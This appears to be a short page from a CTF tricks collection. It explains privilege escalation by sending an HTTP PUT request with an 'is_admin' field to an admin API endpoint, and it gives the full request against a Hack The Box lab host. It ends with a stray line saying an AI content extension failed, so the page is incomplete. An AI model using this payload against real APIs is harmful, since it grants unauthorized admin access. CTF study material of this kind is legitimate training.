> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-17/bypass/access-control/trick-0352.md).

# Api Put Request To Change User Role

***

Exploit API endpoints allowing PUT requests to modify user data. By identifying the correct endpoint and required parameters (like email or user ID) in the payload, you can potentially alter sensitive attributes like `is_admin` status. Ensure the correct `Content-Type` header (like `application/json`) is set for the API to parse the body correctly.

```http
PUT /api/v1/admin HTTP/1.1
Host: 2million.htb
Content-Type: application/json
Content-Length: <calculated_length>

{"email":"ghost@ghost.com","is_admin":1}
```

\[Content extension failed: AI response malformed]
